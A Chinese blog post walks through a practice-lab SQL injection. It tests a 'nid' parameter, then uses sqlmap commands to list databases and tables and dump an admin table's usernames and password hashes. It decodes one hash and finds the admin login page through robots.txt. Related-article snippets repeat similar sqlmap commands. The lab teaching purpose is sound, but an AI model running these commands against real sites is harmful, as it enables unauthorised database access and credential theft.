sqlmap靶机实战

最新推荐文章于 2024-06-25 09:11:48 发布
最新推荐文章于 2024-06-25 09:11:48 发布
阅读量382 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46485934/article/details/108520206
版权

一.寻找目标网站的注入点(靶机实战)

在这里插入图片描述
寻找注入点,随机点击一篇文章
url :http://117.167.136.244:28026/index/narticle.php?nid=3099
sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’
在这里插入图片描述确定存在注入

二.使用sqlmap

  • sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs

在这里插入图片描述

  • sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -D rjxy -tables
    在这里插入图片描述
  • sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -D rjxy -T manager -columns
    在这里插入图片描述
  • sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -D rjxy -T manager -C password,username,uid -dump
    在这里插入图片描述

三.密码破解

密码有加密
ZGM2M2VlMmUyYTE2M2Q0NmE3MGFiNDRhNzUxYzBkMjA=
猜测base64加密,然后解密得
dc63ee2e2a163d46a70ab44a751c0d20
总共有32位字母和数字,猜测md5加密
在这里插入图片描述

四.登录后台

访问http://117.167.136.244:28026/robots.txt
在这里插入图片描述

http://117.167.136.244:28026/admins/login.php
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

软大彭少
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap测试靶机
weixin_44940180的博客
08-09 458
测试SQL注入 Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49" 可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload 获取数据库信息GET型 1. 获取数据库名字 sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="securit
Sqlmap实战
春天不是读书人的博客
08-25 370
以知识盒子为案例,记录基本用法 检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tabl
【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)
最新发布
Libra1313的博客
06-25 1142
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段SQLmap第四篇。本阶段主要讲解什么是SQLmap安装和实战案例。
sqlmap实战
jihaichen的博客
05-06 494
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 p...
SQLmap实战
unsurpassed的博客
03-13 705
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 ...
SQLMAP使用实战测试
06-12
#### 二、SQLMap实战流程 ##### 2.1 目标站点确定与初步分析 - **目标站点**:http://www.58ly.net - **站点特点**:该网站位于一台服务器上,服务器上还托管了其他多个站点。 - **初步分析**:使用应用扫描器(如...
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据库的控制和数据的提取。标题"sqlmap-master"暗示了我们讨论...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
SQLMAP Windows
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
sqlmap自动扫描工具
06-14
SQLMap是一款广泛使用的开源自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器中的安全漏洞。下面将详细介绍SQLMap的工作原理、功能...
sqlmap实战(攻击靶机
weixin_50644630的博客
09-12 920
sqlmap实战(攻击学校靶机) 进入学校靶机 找到注入点,并放入sqlmap中测试是否可以注入 查看数据库 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" --dbs 查询数据库 “rjxy” 的数据表 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" -D rjxy --tables 查询manager数据表的字段
【网络安全】sqlmap实战
你在看屏幕的同时,屏幕也在注视着你
04-09 1221
sqlmap实战一、sqlmap配置(1)python27安装(2)sqlmap安装(3)配置环境变量(4)验证是否配置完成二、sqlmap语法(1)常用语法及其说明(2)sqlmap的使用说明三、sqlmap实战实战操作四、总结 一、sqlmap配置 (1)python27安装 python2.7 下载地址 这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装(我这里安装路径为D:\python\python2.7) (2)sqlmap安装 1.sqlmap的 下
sqlmap实战靶机
sweetie 的博客
09-10 1178
sqlmap攻击学校靶机 进入学校网页主页 随机点击 使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username” 遇到选择 do you want to crack them via a dictionary-based attack? [Y/n/q] Y do you want to use
sqlmap靶机实战注入
weixin_50644728的博客
09-12 496
1.进入rdctf平台部署网站 将获得的网址放入浏览器搜索框中,进入网站之后随意点进一个页面。 2.检测url是否存在sql注入的风险 window键+R调出命令运行框,切换目录到sqlmap的绝对路径后,输入以下命令,利用sqlmap判断此url是否有sql注入的风险。 python sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3100” 下图表明当前的url中的nid存在SQL注入 3.在输入下面命令获取数据库名
神器SQLmap实战详解
Sgirll的博客
04-07 486
本文将以SQLMap工具为核心,深入探讨SQL注入的原理、检测、利用及防御策略,旨在为网络安全研究人员、渗透测试人员提供实用指南。通过学习和使用像SQLMap这样的工具,我们不仅能够更好地理解SQL注入的原理和攻击手法,还能够加强我们的应用程序和数据库的安全防护。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。SQLMap是一款开源的自动化SQL注入测试工具,它能够检测和利用Web应用中的SQL注入漏洞。
SQLMAP使用教程(二)实战技巧一
不秃头的程序Yang
07-04 1280
1、获取数据库 2、获取表 3、获取列 4、获取字段 5、获取数据 6、删除缓存文件
sqlmap一次实战
suancai1993的博客
09-11 1881
这是墨者学院一个SQL注入漏洞靶场:http://219.153.49.228:49835/show.php?id=MQo= 【目的是寻找key】 【想练习的可以去墨者学院–>在线靶场–>web安全–>sql注入–>sql注入实战-MySQL】 不启动靶场进不去这个链接 进入网站提示的信息如下图所示: 从这个网页提示信息我们也可以窥视出一些东西: 它使用的数据库类...
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4742
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMAP实战教程:安装、配置与高级注入命令
这篇文章提供了SQLMAP的基本使用指南,包括安装、环境配置,以及一系列实战性的命令应用和参数解读,适合那些希望深入学习和实践SQL注入检测的网络安全从业人员。通过这些步骤,读者可以更有效地利用SQLMAP来检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值